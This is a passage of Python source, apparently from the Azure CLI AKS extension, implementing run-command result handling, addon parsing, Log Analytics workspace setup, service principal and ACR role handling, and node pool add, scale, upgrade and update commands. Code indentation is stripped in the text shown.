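    # For AAD-enabled clusters, attach a dataplane token scoped to the AKS AAD server
    # application (the GUID below is assumed to be its well-known application ID) so the
    # run-command can be authorized inside the cluster.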
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.run_command(
resource_group_name, name, request_payload, long_running_operation_timeout=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise CLIError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
    # cli_ctx.data['safe_params'] contains the list of parameter names the user typed in, without values.
    # CLI core also uses this to calculate the ParameterSetName header for every HTTP request from the CLI.
if cli_ctx.data['safe_params'] is None or "-o" in cli_ctx.data['safe_params'] or "--output" in cli_ctx.data['safe_params']:
# user specified output format, honor their choice, return object to render pipeline
return commandResult
else:
        # user didn't specify any format, so we can customize the output for the best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, finished at {commandResult.finished_at}, with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
    # "." means attach the current folder; it cannot be combined with other files (at least for now).
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise CLIError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise CLIError(f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
    # zipFile.printdir()  # uncomment to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False):
if not addon_profiles:
addon_profiles = {}
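    # Translate the comma-separated --enable-addons value into ManagedClusterAddonProfile
    # entries; each recognized addon is removed from the list and anything left over is
    # rejected at the end.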
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons or 'azure-defender' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
if 'monitoring' in addons:
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
if 'azure-defender' in addons:
addon_profiles[CONST_AZURE_DEFENDER_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('azure-defender')
# error out if '--enable-addons=monitoring/azure-defender' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons [monitoring/azure-defender]".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
    # log analytics only supports the China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
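    # Map the resource group's region to a supported Log Analytics region (and its short
    # code) for the current cloud, then create or reuse a DefaultWorkspace in a
    # DefaultResourceGroup named after that code.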
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
logger.error(
"AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.cli.core.profiles import ResourceType
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except HttpResponseError as ex:
if ex.status_code != 404:
raise ex
else:
ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
resource_group = ResourceGroup(location=workspace_region)
resource_groups.create_or_update(default_workspace_resource_group, resource_group)
GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
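        # Poll the ARM deployment until the workspace resource exists, then return its ID.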
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
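    # ARM template that deploys the ContainerInsights solution onto the target Log
    # Analytics workspace (a nested deployment into the workspace's own subscription/RG).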
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate that --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
                'min-count and max-count are only valid together with --enable-cluster-autoscaler; please specify that flag.')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
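    # Build the agent pool model from the parsed CLI arguments; optional settings such as
    # spot pricing, autoscaler bounds, OS disk and kubelet/OS config are applied below.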
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
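    # The three autoscaler flags are summed as booleans; if no single flag is set and no
    # other update (tags/mode/max-surge) was requested, there is nothing to do.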
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
